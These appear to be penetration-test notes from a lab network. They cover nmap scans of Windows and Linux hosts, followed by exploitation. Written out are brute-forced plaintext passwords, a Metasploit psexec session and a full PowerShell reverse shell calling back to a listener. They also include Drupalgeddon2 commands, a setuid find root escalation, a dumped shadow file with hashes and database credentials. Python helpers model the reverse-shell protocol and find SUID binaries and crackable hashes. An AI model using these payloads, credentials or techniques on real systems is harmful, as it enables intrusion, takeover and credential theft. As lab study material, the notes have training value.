Wa0237. - 2025 01 11 22 59 250115141431

192.168.100.67

PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 3072 58:2d:1d:72:4c:72:b9:b5:a3:80:6b:74:d4:08:85:78 (RSA)
| 256 d1:f5:9f:6a:32:13:62:11:2b:8e:45:74:25:7e:a4:73 (ECDSA)
|_ 256 8c:de:40:e5:a7:6e:fe:43:ce:0c:a2:09:60:f5:5a:2f (ED25519)
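Reading the nmap output in these notes comes down to the same few checks on every host: whether SMB signing is required (a host that does not require it can be hit with NTLM relay), whether FTP allows anonymous login, whether the web server exposes WebDAV verbs that write files onto IIS, and which Windows build rdp-ntlm-info leaks. The parser below is an added example and not part of the original notes; it reads nmap's normal output format, the format pasted throughout this page, and reduces each host to those findings. SAMPLE is a constructed excerpt of the notes' own output for 192.168.100.51 and 192.168.100.52, with the "Nmap scan report for" header lines added because the paste omits them.

```python
"""Triage of nmap normal-format output for the findings in these notes.
Added example, not from the original notes. SAMPLE is a constructed excerpt of
the notes' scan output (192.168.100.51 and .52); the "Nmap scan report for"
header lines are added because the paste omits them."""
import re
from dataclasses import dataclass, field

SAMPLE = """\
Nmap scan report for 192.168.100.51
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_04-19-22 01:19AM 1400 cmdasp.aspx
80/tcp   open  http
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
| rdp-ntlm-info:
|   Target_Name: WINSERVER-02
|   Product_Version: 6.3.9600
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   3.0.2:
|_    Message signing enabled but not required

Nmap scan report for 192.168.100.52
PORT    STATE SERVICE
445/tcp open  microsoft-ds
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# Build numbers leaked by rdp-ntlm-info and the OS generation they identify.
BUILD_NAMES = {"6.3.9600": "Windows Server 2012 R2 / 8.1",
               "10.0.14393": "Windows Server 2016 / 10 1607",
               "10.0.17763": "Windows Server 2019 / 10 1809"}
UPLOAD_METHODS = {"PUT", "MOVE", "COPY"}   # WebDAV verbs that write to the server


@dataclass
class HostTriage:
    ip: str
    open_ports: dict = field(default_factory=dict)       # port -> service name
    smb_signing: str = "unknown"                         # required | not required | disabled
    anonymous_ftp: bool = False
    risky_http_methods: set = field(default_factory=set)
    rdp_hostname: str = ""
    rdp_build: str = ""

    @property
    def os_from_build(self):
        return BUILD_NAMES.get(self.rdp_build, "unknown build")

    @property
    def webdav_upload(self):
        return bool(self.risky_http_methods & UPLOAD_METHODS)

    @property
    def relay_candidate(self):
        # NTLM relay to SMB only lands on hosts that do not enforce signing.
        return self.smb_signing in ("not required", "disabled")


HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+(\S+)")


def triage(nmap_text):
    """One HostTriage per 'Nmap scan report for' block."""
    hosts, cur = [], None
    for raw in nmap_text.splitlines():
        line = raw.strip()
        if m := HOST_RE.match(line):
            cur = HostTriage(ip=m.group(1))
            hosts.append(cur)
            continue
        if cur is None:
            continue
        if m := PORT_RE.match(line):
            cur.open_ports[int(m.group(1))] = m.group(2)
            continue
        body = line.lstrip("|_ ")                        # drop the NSE tree prefix
        if body.startswith("ftp-anon: Anonymous FTP login allowed"):
            cur.anonymous_ftp = True
        elif body.startswith("Potentially risky methods:"):
            cur.risky_http_methods.update(body.split(":", 1)[1].split())
        elif body.startswith("Target_Name:"):
            cur.rdp_hostname = body.split(":", 1)[1].strip()
        elif body.startswith("Product_Version:"):
            cur.rdp_build = body.split(":", 1)[1].strip()
        elif "Message signing enabled and required" in body:
            cur.smb_signing = "required"                 # SMB2 line is authoritative
        elif "Message signing enabled but not required" in body:
            cur.smb_signing = "not required"
        elif body.startswith("message_signing: disabled") and cur.smb_signing == "unknown":
            cur.smb_signing = "disabled"                 # SMB1 view; only if no SMB2 line seen
    return hosts


def report(hosts):
    for h in hosts:
        print(f"{h.ip} ports={sorted(h.open_ports)} smb_signing={h.smb_signing} "
              f"relay={h.relay_candidate} anon_ftp={h.anonymous_ftp} "
              f"webdav_upload={h.webdav_upload} rdp={h.rdp_hostname or '-'} "
              f"build={h.rdp_build or '-'} ({h.os_from_build})")


if __name__ == "__main__":
    report(triage(SAMPLE))
```

The smb2-security-mode line is the one to trust: smb-security-mode reports the SMB1 view, which modern Windows hosts may not even serve, so the parser only falls back to it when no SMB2 line was seen. Run it against a full `nmap -sC -sV -oN` file and every host with signing "not required" plus an IIS that accepts PUT or MOVE is the same picture as 192.168.100.51 below.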

192.168.100.63 - windows - EC2AMAZ-IK4QFED

Open ports:
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3307/tcp open opsession-prxy
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49186/tcp open unknown

Service and script scan:
80/tcp open http
|_http-title: WAMPSERVER Homepage
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3307/tcp open opsession-prxy
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-IK4QFED
| NetBIOS_Domain_Name: EC2AMAZ-IK4QFED
| NetBIOS_Computer_Name: EC2AMAZ-IK4QFED
| DNS_Domain_Name: EC2AMAZ-IK4QFED
| DNS_Computer_Name: EC2AMAZ-IK4QFED
| Product_Version: 10.0.14393
|_ System_Time: 2024-11-21T10:29:53+00:00
|_ssl-date: 2024-11-21T10:29:53+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=EC2AMAZ-IK4QFED
| Not valid before: 2024-11-20T10:14:59
|_Not valid after: 2025-05-22T10:14:59
MAC Address: 06:E1:3F:65:2E:A3 (Unknown)


192.168.100.50 - windows - WINSERVER-01

Service and script scan:
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: WINSERVER-01
| NetBIOS_Domain_Name: WINSERVER-01
| NetBIOS_Computer_Name: WINSERVER-01
| DNS_Domain_Name: WINSERVER-01
| DNS_Computer_Name: WINSERVER-01
| Product_Version: 6.3.9600
|_ System_Time: 2024-11-21T10:28:14+00:00
|_ssl-date: 2024-11-21T10:28:13+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WINSERVER-01
| Not valid before: 2024-11-20T10:16:45
|_Not valid after: 2025-05-22T10:16:45
5985/tcp open wsman
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
49186/tcp open unknown
MAC Address: 06:46:AF:A2:39:83 (Unknown)

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: WINSERVER-01
| NetBIOS computer name: WINSERVER-01\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-21T10:28:14+00:00
| smb2-time:
| date: 2024-11-21T10:28:14
|_ start_date: 2024-11-21T10:16:42
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: WINSERVER-01, NetBIOS user: <unknown>, NetBIOS MAC: 06:46:af:a2:39:83 (unknown)

Running: Microsoft Windows 7|2012|8.1
OS CPE: cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_2012 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1

Credentials (hydra):
[3389][rdp] host: 192.168.100.50 login: mike password: diamond


192.168.100.57, 192.168.0.61: listed as hosts, no scan output recorded.


192.168.100.55 - windows - WINSERVER-03

Open ports:
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49672/tcp open unknown

Service and script scan:
80/tcp open http
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
|_ssl-date: 2024-11-21T10:24:30+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: WINSERVER-03
| NetBIOS_Domain_Name: WINSERVER-03
| NetBIOS_Computer_Name: WINSERVER-03
| DNS_Domain_Name: WINSERVER-03
| DNS_Computer_Name: WINSERVER-03
| Product_Version: 10.0.17763
|_ System_Time: 2024-11-21T10:24:30+00:00
| ssl-cert: Subject: commonName=WINSERVER-03
| Not valid before: 2024-11-20T10:16:07
|_Not valid after: 2025-05-22T10:16:07
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49672/tcp open unknown
MAC Address: 06:B0:79:03:36:F3 (Unknown)

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows Server 2019 Datacenter 17763 (Windows Server 2019 Datacenter 6.3)
| Computer name: WINSERVER-03
| NetBIOS computer name: WINSERVER-03\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-11-21T10:24:30+00:00
|_nbstat: NetBIOS name: WINSERVER-03, NetBIOS user: <unknown>, NetBIOS MAC: 06:b0:79:03:36:f3 (unknown)
| smb2-time:
| date: 2024-11-21T10:24:30
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required

Credentials:
[445][smb] host: 192.168.100.55 login: lawrence password: computadora  (hydra)
SMB 192.168.100.55 445 WINSERVER-03 [+] WINSERVER-03\administrator:swordfish (Pwn3d!)  (crackmapexec)

Shell as SYSTEM with the administrator password through psexec:
msf6 exploit(windows/smb/psexec) > set rhosts 192.168.100.55
rhosts => 192.168.100.55
msf6 exploit(windows/smb/psexec) > set SMBPass swordfish
SMBPass => swordfish
msf6 exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf6 exploit(windows/smb/psexec) > rub
[-] Unknown command: rub
msf6 exploit(windows/smb/psexec) > run


192.168.100.52 - linux - ip-192-168-100-52

Open ports:
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server

Service and script scan:
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 65534 65534 318 Apr 18 2022 updates.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.100.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh
| ssh-hostkey:
| 3072 ac:09:d2:3b:55:fb:dd:e1:51:2a:dd:e7:26:68:d8:67 (RSA)
| 256 08:6a:db:14:2c:28:55:cf:32:ee:cc:d8:36:f4:2e:5b (ECDSA)
|_ 256 57:2e:b2:40:fe:3e:8f:c1:d1:1b:2a:f6:be:a6:bb:03 (ED25519)
80/tcp open http
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2018-02-21 17:28 drupal/
|_
|_http-title: Index of /
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.34-MariaDB-0ubuntu0.20.04.1
| Thread ID: 36
| Capabilities flags: 63486
| Some Capabilities: IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal, Support41Auth, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, ConnectWithDatabase, IgnoreSigpipes, SupportsTransactions, FoundRows, InteractiveClient, LongColumnFlag, SupportsCompression, Speaks41ProtocolNew, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
| Status: Autocommit
| Salt: Md/YSsmFUZC}q<wes1:o
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server
MAC Address: 06:54:93:2E:48:49 (Unknown)

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-11-21T10:24:11
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: IP-192-168-100-, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.13.17-Ubuntu)
| Computer name: ip-192-168-100-52
| NetBIOS computer name: IP-192-168-100-52\x00
| Domain name: me-south-1.compute.internal
| FQDN: ip-192-168-100-52.me-south-1.compute.internal
|_ System time: 2024-11-21T10:24:11+00:00


192.168.100.51 - windows - WINSERVER-02

Open ports:
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown

Service and script scan:
21/tcp open ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 04-19-22 02:25AM <DIR> aspnet_client
| 04-19-22 01:19AM 1400 cmdasp.aspx
| 04-19-22 12:17AM 99710 iis-85.png
| 04-19-22 12:17AM 701 iisstart.htm
|_04-19-22 02:13AM 22 robots.txt.txt
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
| http-webdav-scan:
| Server Type: Microsoft-IIS/8.5
| Directory Listing:
| http://ip-192-168-100-51.me-south-1.compute.internal/
| http://ip-192-168-100-51.me-south-1.compute.internal/aspnet_client/
| http://ip-192-168-100-51.me-south-1.compute.internal/cmdasp.aspx
| http://ip-192-168-100-51.me-south-1.compute.internal/iis-85.png
| http://ip-192-168-100-51.me-south-1.compute.internal/iisstart.htm
| http://ip-192-168-100-51.me-south-1.compute.internal/robots.txt.txt
|_ Server Date: Thu, 21 Nov 2024 10:29:18 GMT
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: WINSERVER-02
| NetBIOS_Domain_Name: WINSERVER-02
| NetBIOS_Computer_Name: WINSERVER-02
| DNS_Domain_Name: WINSERVER-02
| DNS_Computer_Name: WINSERVER-02
| Product_Version: 6.3.9600
|_ System_Time: 2024-11-21T10:28:05+00:00
|_ssl-date: 2024-11-21T10:28:05+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=WINSERVER-02
| Not valid before: 2024-11-20T10:16:32
|_Not valid after: 2025-05-22T10:16:32
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
MAC Address: 06:60:63:96:7A:F7 (Unknown)

Host script results:
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WINSERVER-02, NetBIOS user: <unknown>, NetBIOS MAC: 06:60:63:96:7a:f7 (unknown)
| smb2-time:
| date: 2024-11-21T10:28:05
|_ start_date: 2024-11-21T10:16:21

Running: Microsoft Windows 2012|7|8.1
OS CPE: cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_7:::ultimate cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2012 R2 Update 1, Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1

Reverse shell through the web shell at http://192.168.100.51/cmdasp.aspx (the same cmdasp.aspx is visible over anonymous FTP and in the WebDAV listing), connecting back to the listener on 192.168.100.5:1337:
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('192.168.100.5', 1337);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
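The PowerShell one-liner used against 192.168.100.51 above has a small wire protocol of its own: it writes an empty string plus the prompt 'SHELL> ' on connect, reads one buffer per command, decodes BytesRead - 1 bytes (dropping the trailing newline a terminal sends) and answers with the command output followed by the prompt again. The code below is an added example, not part of the notes, that models both ends of that exchange on a loopback socket so the framing can be exercised offline: implant() follows the one-liner's loop but answers from a constructed table instead of calling Invoke-Expression, and the operator side is what a hand-written listener has to do to drive it. The FAKE_RESULTS values are made up for the example.

```python
"""Framing of the PowerShell reverse shell used against 192.168.100.51.
Added example, not from the notes. implant() mirrors the one-liner's loop
(prompt, read, decode BytesRead - 1 bytes, reply) but answers from a
constructed table instead of executing anything; the operator side shows
what a listener must send to talk to it."""
import socket
import threading

PROMPT = b"SHELL> "
# Constructed stand-in for command execution: command -> output.
FAKE_RESULTS = {"whoami": "winserver-02\\example\r\n", "hostname": "WINSERVER-02\r\n"}


def implant(sock):
    """The target side, as the one-liner behaves once it has connected back."""
    sock.sendall(PROMPT)                              # WriteToStream ''
    while True:
        buf = sock.recv(65536)                        # $NetworkStream.Read(...)
        if not buf:
            break
        command = buf[:-1].decode("utf-8")            # GetString($Buffer, 0, $BytesRead - 1)
        output = FAKE_RESULTS.get(command, f"'{command}' is not recognized\r\n")
        sock.sendall(output.encode() + PROMPT)        # WriteToStream ($Output)
    sock.close()


def read_until_prompt(sock):
    """Operator side: a reply is complete when the implant's prompt arrives."""
    data = b""
    while not data.endswith(PROMPT):
        chunk = sock.recv(4096)
        if not chunk:
            return data
        data += chunk
    return data[:-len(PROMPT)]


def run_command(sock, command, newline=True):
    """Send one command. The trailing newline is not cosmetic: the implant
    discards the last byte of every read, so without it the command loses
    its final character."""
    sock.sendall(command.encode() + (b"\n" if newline else b""))
    return read_until_prompt(sock).decode()


def exchange(commands):
    """Listener on a loopback port, implant connecting back, commands run in
    order. commands is a list of (text, send_newline); returns the banner
    read before the first prompt and the list of outputs."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    t = threading.Thread(
        target=lambda: implant(socket.create_connection(("127.0.0.1", port))),
        daemon=True)
    t.start()
    conn, _ = listener.accept()
    banner = read_until_prompt(conn)                  # empty output before the first prompt
    outputs = [run_command(conn, text, nl) for text, nl in commands]
    conn.close()                                      # recv() returns b"" and the implant loop ends
    t.join(timeout=5)
    listener.close()
    return banner, outputs


if __name__ == "__main__":
    _, outs = exchange([("whoami", True), ("hostname", True), ("whoami", False)])
    for o in outs:
        print(repr(o))
```

The third command in the demo is sent without a newline and comes back as "'whoam' is not recognized": that is what happens when a scripted listener (or a tool that does not append a line ending) drives this payload. Interactive nc or Metasploit's multi/handler both terminate lines with a newline, so the quirk never shows up until the shell is automated.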

192.168.100.52 - linux - exploitation

Drupalgeddon2 through Metasploit against the Drupal install under /drupal/ on port 80:
use unix/webapp/drupal_drupalgeddon2
set lhost 192.168.100.5
set rhosts 192.168.100.52
set targeturi /drupal/
run

Root from the resulting shell via the setuid find binary (-p matters when the spawned shell is bash, which otherwise drops the elevated effective UID):
find . -exec /bin/sh -p \; -quit

Credentials (hydra, ssh):
[22][ssh] host: 192.168.100.52 login: auditor password: qwertyuiop
[22][ssh] host: 192.168.100.52 login: dbadmin password: sayang
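The find trick above only works because find(1) on that host carries the setuid bit and is owned by root; the step that reveals such binaries is the enumeration below. It is an added example, not from the notes: find_suid() walks a tree with os.lstat (symlinks are not followed), keeps regular files with the setuid bit whose owner is the given UID, and returns them sorted, which is the list you take to a GTFOBins lookup. Run stand-alone it scans the directory given on the command line (default /usr/bin).

```python
"""Locate setuid-root binaries, the enumeration behind the find -exec /bin/sh -p
privilege escalation. Added example, not part of the original notes."""
import os
import stat
import sys


def find_suid(root, owner_uid=0):
    """Regular files under root with the setuid bit set and owned by owner_uid
    (root by default). Unreadable entries are skipped, as 2>/dev/null would."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)               # do not follow symlinks
            except OSError:
                continue
            is_suid = bool(st.st_mode & stat.S_ISUID)
            if stat.S_ISREG(st.st_mode) and is_suid and st.st_uid == owner_uid:
                hits.append(path)
    return sorted(hits)


if __name__ == "__main__":
    for path in find_suid(sys.argv[1] if len(sys.argv) > 1 else "/usr/bin"):
        print(path)
```

Anything in that list that is not a stock setuid program (passwd, sudo, su, mount and the like) deserves a look; find, vim, python or a copied shell with the bit set is a one-command root, exactly as on 192.168.100.52.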

Database credentials from the Drupal settings.php on 192.168.100.52:

$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupal',
'username' => 'drupal',
'password' => 'syntex0421',
'host' => 'localhost',
'port' => '3306',
'driver' => 'mysql',
'prefix' => '',
),
),
);

cat /etc/shadow (passwords noted beside the dump: root:sayang, auditor:qwertyuiop)
root:$6$v8b2/P8T26uEUwvM$TBiao8o1dfqQrGPPcebRj6A6cNiixcy6/r/AFtN5Swk7N1kpg/8UyQK0pXFwdLfy5Ed/71VN91nJ6.3JyAN/00:18998:0:99999:7:::
daemon:*:18960:0:99999:7:::
bin:*:18960:0:99999:7:::
sys:*:18960:0:99999:7:::
sync:*:18960:0:99999:7:::
games:*:18960:0:99999:7:::
man:*:18960:0:99999:7:::
lp:*:18960:0:99999:7:::
mail:*:18960:0:99999:7:::
news:*:18960:0:99999:7:::
uucp:*:18960:0:99999:7:::
proxy:*:18960:0:99999:7:::
www-data:*:18960:0:99999:7:::
backup:*:18960:0:99999:7:::
list:*:18960:0:99999:7:::
irc:*:18960:0:99999:7:::
gnats:*:18960:0:99999:7:::
nobody:*:18960:0:99999:7:::
systemd-network:*:18960:0:99999:7:::
systemd-resolve:*:18960:0:99999:7:::
systemd-timesync:*:18960:0:99999:7:::
messagebus:*:18960:0:99999:7:::
syslog:*:18960:0:99999:7:::
_apt:*:18960:0:99999:7:::
tss:*:18960:0:99999:7:::
uuidd:*:18960:0:99999:7:::
tcpdump:*:18960:0:99999:7:::
sshd:*:18960:0:99999:7:::
landscape:*:18960:0:99999:7:::
pollinate:*:18960:0:99999:7:::
ec2-instance-connect:!:18960:0:99999:7:::
systemd-coredump:!!:18998::::::
ubuntu:!:18998:0:99999:7:::
lxd:!:18998::::::
rtkit:*:18998:0:99999:7:::
xrdp:!:18998:0:99999:7:::
dnsmasq:*:18998:0:99999:7:::
usbmux:*:18998:0:99999:7:::
avahi:*:18998:0:99999:7:::
cups-pk-helper:*:18998:0:99999:7:::
pulse:*:18998:0:99999:7:::
geoclue:*:18998:0:99999:7:::
saned:*:18998:0:99999:7:::
colord:*:18998:0:99999:7:::
sddm:*:18998:0:99999:7:::
gdm:*:18998:0:99999:7:::
auditor:$6$RNJCCrE9ok/yCMqD$7uPoYFsrnR3wPnSwPeLuBEiXgAzlOzGW6uZSyX.IjNNVcR5.bDBhb.dlZTN37JJR4yZXXQTetuUhOOX9ZNov6/:19099:0:99999:7:::
dbadmin:$6$1HAbXNNxXVVNCcoi$6Zy2gjvyZZYHTwSyxSLsdv0LA.5hA7EeD1WhUFzHg9SOSXrz7DxX7iG0mCQbmEBSo.yjB1c80iIujSM6Fjbpo/:19099:0:99999:7:::
mysql:!:19099:0:99999:7:::
ftp:*:19100:0:99999:7:::
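Only three of the entries above are worth cracking: root, auditor and dbadmin carry $6$ (sha512crypt) hashes, everything else is locked with ! or *. The parser below is an added example, not from the notes; it reads shadow(5) lines, separates locked and empty-password accounts from ones with a real hash, names the algorithm from the $id$ prefix, checks that the hash has the length that algorithm produces (a hash mangled by a line-wrapped copy, as in the original dump, cannot be cracked), and converts the days-since-1970 fields to dates. SAMPLE is a constructed subset of the dump above with the three full hashes as printed there.

```python
"""Triage of an /etc/shadow dump. Added example, not from the notes; SAMPLE is
a constructed subset of the dump from 192.168.100.52 with its three hashes."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

SAMPLE = """\
root:$6$v8b2/P8T26uEUwvM$TBiao8o1dfqQrGPPcebRj6A6cNiixcy6/r/AFtN5Swk7N1kpg/8UyQK0pXFwdLfy5Ed/71VN91nJ6.3JyAN/00:18998:0:99999:7:::
daemon:*:18960:0:99999:7:::
ec2-instance-connect:!:18960:0:99999:7:::
systemd-coredump:!!:18998::::::
ubuntu:!:18998:0:99999:7:::
lxd:!:18998::::::
auditor:$6$RNJCCrE9ok/yCMqD$7uPoYFsrnR3wPnSwPeLuBEiXgAzlOzGW6uZSyX.IjNNVcR5.bDBhb.dlZTN37JJR4yZXXQTetuUhOOX9ZNov6/:19099:0:99999:7:::
dbadmin:$6$1HAbXNNxXVVNCcoi$6Zy2gjvyZZYHTwSyxSLsdv0LA.5hA7EeD1WhUFzHg9SOSXrz7DxX7iG0mCQbmEBSo.yjB1c80iIujSM6Fjbpo/:19099:0:99999:7:::
mysql:!:19099:0:99999:7:::
ftp:*:19100:0:99999:7:::
"""

HASH_IDS = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
HASH_LEN = {"md5crypt": 22, "sha256crypt": 43, "sha512crypt": 86}  # digest chars in crypt base64
EPOCH = date(1970, 1, 1)


def days_to_date(field):
    """shadow stores dates as days since 1970-01-01; empty means unset."""
    return EPOCH + timedelta(days=int(field)) if field else None


@dataclass
class ShadowEntry:
    user: str
    secret: str
    last_change: Optional[date]
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]

    @property
    def state(self):
        if self.secret == "":
            return "no password"          # password login succeeds with an empty string
        if self.secret.startswith(("!", "*")):
            return "locked"
        return "hashed"

    @property
    def algorithm(self):
        parts = self.secret.split("$")    # ['', id, salt, hash] or with a rounds= part
        if self.state != "hashed" or len(parts) < 4:
            return None
        return HASH_IDS.get(parts[1], f"unknown id {parts[1]}")

    @property
    def hash_complete(self):
        expected = HASH_LEN.get(self.algorithm)
        return expected is not None and len(self.secret.split("$")[-1]) == expected


def parse_shadow(text):
    """user -> ShadowEntry for every non-empty line, in file order."""
    entries = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        f = line.split(":")
        f += [""] * (9 - len(f))          # tolerate lines with trailing fields missing
        entries[f[0]] = ShadowEntry(
            user=f[0], secret=f[1], last_change=days_to_date(f[2]),
            min_days=int(f[3]) if f[3] else None,
            max_days=int(f[4]) if f[4] else None,
            warn_days=int(f[5]) if f[5] else None)
    return entries


def crackable(entries):
    """Accounts worth handing to john or hashcat: real, complete hashes only."""
    return [e.user for e in entries.values() if e.state == "hashed" and e.hash_complete]


if __name__ == "__main__":
    for e in parse_shadow(SAMPLE).values():
        print(f"{e.user:22} {e.state:12} {e.algorithm or '-':12} set {e.last_change}")
```

The last_change field is the cheapest hint in the file: root's password was set on 2022-01-06, auditor's and dbadmin's on 2022-04-17, the same day the updates.txt on FTP and the cmdasp.aspx files on 192.168.100.51 are dated, which points to the accounts having been created when the lab was built rather than being part of the base image.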
